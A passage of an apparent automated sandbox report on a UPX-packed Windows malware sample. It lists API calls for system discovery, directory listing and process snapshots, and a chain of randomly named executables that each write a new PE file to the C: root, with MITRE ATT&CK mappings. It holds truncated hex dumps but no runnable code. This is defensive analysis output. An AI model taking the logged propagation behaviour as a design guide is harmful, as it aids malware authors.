140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000690068b6690063b66900000000000000000000006200000000011ce312000000000080f0120095e1337784220700feffffff435c377750593777aa000000b800000062b6690060b66900a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c367760d84b75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed37778ab66900a06a0d7586000000a4e41200dce812000000000086008800a06a0d75a4e41200916c0d758ab66900a06a0d75a06a0d7514e9120002020000 (UID: 00000000-00005940)\n \"lthxxd.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005940)\n \"bbpbfhd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100e8262100e3262100000000000000000000001900000000011ce312000000000080f0120095e1337719240700feffffff435c377750593777aa000000b8000000e2262100e0262100a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c367760d84b75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed37770a272100a06a0d7586000000a4e41200dce812000000000086008800a06a0d75a4e41200916c0d750a272100a06a0d75a06a0d7514e9120002020000 (UID: 00000000-00005952)\n \"bbpbfhd.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005952)\n \"ntpbdh.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001d0078261d0073261d00000000000000000000001500000000011ce312000000000080f0120095e13377132b0700feffffff435c377750593777aa000000b800000072261d0070261d00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c367760d84b75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed37779a261d00a06a0d7586000000a4e41200dce812000000000086008800a06a0d75a4e41200916c0d759a261d00a06a0d75a06a0d7514e9120002020000 (UID: 00000000-00005756)\n \"ntpbdh.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005756)\n \"rrjxnjh.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005464)\n \"rrjxnjh.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000640060fe64005bfe640000000000000000000000620000000001ecdf12000000000050ed120095e133777d2a0700feffffff435c377750593777aa000000b80000005afe640058fe640074e11200ace5120000000000000000000000000000000000000000000000000000000000000000001c5c367760d84b75ffffffff1700000024e11200240000000300000014e6120040eb1200ace512008600000050e1120096ed377782fe6400a06a0d758600000074e11200ace512000000000086008800a06a0d7574e11200916c0d7582fe6400a06a0d75a06a0d75e4e5120002020000 (UID: 00000000-00005464)\n \"rrjxnjh.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005464)\n \"004422.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002c00f0bf2c00ebbf2c00000000000000000000002a0000000001ecdf12000000000050ed120095e13377032e0700feffffff435c377750593777aa000000b8000000eabf2c00e8bf2c0074e11200ace5120000000000000000000000000000000000000000000000000000000000000000001c5c367760d84b75ffffffff1700000024e11200240000000300000014e6120040eb1200ace512008600000050e1120096ed377712c02c00a06a0d758600000074e11200ace512000000000086008800a06a0d7574e11200916c0d7512c02c00a06a0d75a06a0d75e4e5120002020000 (UID: 00000000-00006136)\n \"004422.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006136)\n \"rlrbxrl.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002400d0362400cb362400000000000000000000001c00000000011ce312000000000080f0120095e1337718520700feffffff435c377750593777aa000000b8000000ca362400c8362400a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c367760d84b75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed3777f2362400a06a0d7586000000a4e41200dce812000000000086008800a06a0d75a4e41200916c0d75f2362400a06a0d75a06a0d7514e9120002020000 (UID: 00000000-00005992)\n \"rlrbxrl.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005992)\n \"pnrdltb.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006016)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"0004664.exe\" called \"IsWow64Process\" with parameter \"5812\" - (UID: 00000000-00005812)\n \"4060800.exe\" called \"IsWow64Process\" with parameter \"6068\" - (UID: 00000000-00006068)\n \"lthxxd.exe\" called \"IsWow64Process\" with parameter \"5940\" - (UID: 00000000-00005940)\n \"rrjxnjh.exe\" called \"IsWow64Process\" with parameter \"5464\" - (UID: 00000000-00005464)\n \"pnrdltb.exe\" called \"IsWow64Process\" with parameter \"6016\" - (UID: 00000000-00006016)\n \"xnpjdph.exe\" called \"IsWow64Process\" with parameter \"4280\" - (UID: 00000000-00004280)\n \"024648.exe\" called \"IsWow64Process\" with parameter \"2764\" - (UID: 00000000-00002764)\n \"640660.exe\" called \"IsWow64Process\" with parameter \"5892\" - (UID: 00000000-00005892)\n \"22404.exe\" called \"IsWow64Process\" with parameter \"4336\" - (UID: 00000000-00004336)\n \"4862082.exe\" called \"IsWow64Process\" with parameter \"3560\" - (UID: 00000000-00003560)\n \"fnvpbxr.exe\" called \"IsWow64Process\" with parameter \"3432\" - (UID: 00000000-00003432)\n \"njdbdxd.exe\" called \"IsWow64Process\" with parameter \"3540\" - (UID: 00000000-00003540)\n \"brrppv.exe\" called \"IsWow64Process\" with parameter \"3764\" - (UID: 00000000-00003764)\n \"22260.exe\" called \"IsWow64Process\" with parameter \"1920\" - (UID: 00000000-00001920)\n \"26064.exe\" called \"IsWow64Process\" with parameter \"3484\" - (UID: 00000000-00003484)\n \"2848464.exe\" called \"IsWow64Process\" with parameter \"4200\" - (UID: 00000000-00004200)\n \"vdxvjb.exe\" called \"IsWow64Process\" with parameter \"1380\" - (UID: 00000000-00001380)\n \"664004.exe\" called \"IsWow64Process\" with parameter \"4244\" - (UID: 00000000-00004244)\n \"482028.exe\" called \"IsWow64Process\" with parameter \"2776\" - (UID: 00000000-00002776)\n \"6466842.exe\" called \"IsWow64Process\" with parameter \"3700\" - (UID: 00000000-00003700)\n \"82080.exe\" called \"IsWow64Process\" with parameter \"3272\" - (UID: 00000000-00003272)\n \"02848.exe\" called \"IsWow64Process\" with parameter \"2976\" - (UID: 00000000-00002976)\n \"202808.exe\" called \"IsWow64Process\" with parameter \"4104\" - (UID: 00000000-00004104)\n \"fjhdxhf.exe\" called \"IsWow64Process\" with parameter \"3556\" - (UID: 00000000-00003556)\n \"fhjttl.exe\" called \"IsWow64Process\" with parameter \"4172\" - (UID: 00000000-00004172)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005860)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005860)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"FindNextFileW\" with parameter 0004664.exe (UID: 00000000-00005860)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"FindNextFileW\" with parameter 604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe (UID: 00000000-00005860)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00005860)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00005860)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"FindNextFileW\" with parameter Documents and Settings (UID: 00000000-00005860)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00005860)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00005860)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00005860)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"FindNextFileW\" with parameter pagefile.sys (UID: 00000000-00005860)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"FindNextFileW\" with parameter PerfLogs (UID: 00000000-00005860)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"FindNextFileW\" with parameter Program Files (UID: 00000000-00005860)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"FindNextFileW\" with parameter ProgramData (UID: 00000000-00005860)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"FindNextFileW\" with parameter Recovery (UID: 00000000-00005860)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"FindNextFileW\" with parameter System Volume Information (UID: 00000000-00005860)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"FindNextFileW\" with parameter Temp (UID: 00000000-00005860)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"FindNextFileW\" with parameter TorService (UID: 00000000-00005860)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"FindNextFileW\" with parameter Users (UID: 00000000-00005860)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" called \"FindNextFileW\" with parameter Windows (UID: 00000000-00005860)\n \"0004664.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005812)\n \"0004664.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005812)\n \"0004664.exe\" called \"FindNextFileW\" with parameter 0004664.exe (UID: 00000000-00005812)\n \"0004664.exe\" called \"FindNextFileW\" with parameter 4060800.exe (UID: 00000000-00005812)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"0004664.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"4060800.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"lthxxd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rrjxnjh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"pnrdltb.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xnpjdph.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"024648.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"640660.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"22404.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"4862082.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"fnvpbxr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"njdbdxd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"brrppv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"22260.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"26064.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"2848464.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"vdxvjb.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"664004.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"482028.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"6466842.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"82080.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"02848.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"202808.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"fjhdxhf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"fhjttl.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6\" has an entrypoint in section \"UPX1\"\n \"tfpfbjl.exe\" has an entrypoint in section \"UPX1\"\n \"rjvxrf.exe\" has an entrypoint in section \"UPX1\"\n \"pttxvt.exe\" has an entrypoint in section \"UPX1\"\n \"lnnjjb.exe\" has an entrypoint in section \"UPX1\"\n \"jfrfbtr.exe\" has an entrypoint in section \"UPX1\"\n \"bpbtb.exe\" has an entrypoint in section \"UPX1\"\n \"pjbbvdd.exe\" has an entrypoint in section \"UPX1\"\n \"pdnrb.exe\" has an entrypoint in section \"UPX1\"\n \"hpdnldp.exe\" has an entrypoint in section \"UPX1\"\n \"xlrxxtf.exe\" has an entrypoint in section \"UPX1\"\n \"rvhlvt.exe\" has an entrypoint in section \"UPX1\"\n \"vxxfjr.exe\" has an entrypoint in section \"UPX1\"\n \"dnxpf.exe\" has an entrypoint in section \"UPX1\"\n \"drbdjh.exe\" has an entrypoint in section \"UPX1\"\n \"lhrhrpt.exe\" has an entrypoint in section \"UPX1\"\n \"rtrnhfh.exe\" has an entrypoint in section \"UPX1\"\n \"vhftp.exe\" has an entrypoint in section \"UPX1\"\n \"lxhhl.exe\" has an entrypoint in section \"UPX1\"\n \"fnrxft.exe\" has an entrypoint in section \"UPX1\"\n \"dpndv.exe\" has an entrypoint in section \"UPX1\"\n \"rxfxxnn.exe\" has an entrypoint in section \"UPX1\"\n \"xprhl.exe\" has an entrypoint in section \"UPX1\"\n \"npjbvrb.exe\" has an entrypoint in section \"UPX1\"\n \"220404.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" wrote 16348 bytes starting with PE header signature to file \"C:\\0004664.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0004664.exe\" wrote 16360 bytes starting with PE header signature to file \"C:\\4060800.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4060800.exe\" wrote 16371 bytes starting with PE header signature to file \"C:\\482642.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"482642.exe\" wrote 16386 bytes starting with PE header signature to file \"C:\\lthxxd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lthxxd.exe\" wrote 16399 bytes starting with PE header signature to file \"C:\\bbpbfhd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bbpbfhd.exe\" wrote 16415 bytes starting with PE header signature to file \"C:\\ntpbdh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ntpbdh.exe\" wrote 16432 bytes starting with PE header signature to file \"C:\\rrjxnjh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rrjxnjh.exe\" wrote 16445 bytes starting with PE header signature to file \"C:\\004422.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"004422.exe\" wrote 16463 bytes starting with PE header signature to file \"C:\\rlrbxrl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rlrbxrl.exe\" wrote 16473 bytes starting with PE header signature to file \"C:\\pnrdltb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pnrdltb.exe\" wrote 16483 bytes starting with PE header signature to file \"C:\\hvjhb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hvjhb.exe\" wrote 16501 bytes starting with PE header signature to file \"C:\\xnpjdph.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xnpjdph.exe\" wrote 16511 bytes starting with PE header signature to file \"C:\\024648.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"024648.exe\" wrote 16521 bytes starting with PE header signature to file \"C:\\640660.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"640660.exe\" wrote 16541 bytes starting with PE header signature to file \"C:\\22404.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"22404.exe\" wrote 16551 bytes starting with PE header signature to file \"C:\\4862082.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4862082.exe\" wrote 16562 bytes starting with PE header signature to file \"C:\\fnvpbxr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fnvpbxr.exe\" wrote 16579 bytes starting with PE header signature to file \"C:\\njdbdxd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"njdbdxd.exe\" wrote 16589 bytes starting with PE header signature to file \"C:\\brrppv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"brrppv.exe\" wrote 16599 bytes starting with PE header signature to file \"C:\\20640.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"20640.exe\" wrote 16614 bytes starting with PE header signature to file \"C:\\22260.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"22260.exe\" wrote 16633 bytes starting with PE header signature to file \"C:\\408224.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"408224.exe\" wrote 16646 bytes starting with PE header signature to file \"C:\\26064.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"26064.exe\" wrote 16662 bytes starting with PE header signature to file \"C:\\2848464.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2848464.exe\" wrote 16679 bytes starting with PE header signature to file \"C:\\hntdntx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hntdntx.exe\" wrote 16689 bytes starting with PE header signature to file \"C:\\vdxvjb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vdxvjb.exe\" wrote 16705 bytes starting with PE header signature to file \"C:\\664004.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"664004.exe\" wrote 16725 bytes starting with PE header signature to file \"C:\\482028.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"482028.exe\" wrote 16736 bytes starting with PE header signature to file \"C:\\0660220.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0660220.exe\" wrote 16753 bytes starting with PE header signature to file \"C:\\6466842.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6466842.exe\" wrote 16767 bytes starting with PE header signature to file \"C:\\82080.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"82080.exe\" wrote 16780 bytes starting with PE header signature to file \"C:\\02848.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"02848.exe\" wrote 16798 bytes starting with PE header signature to file \"C:\\8486482.exe\": 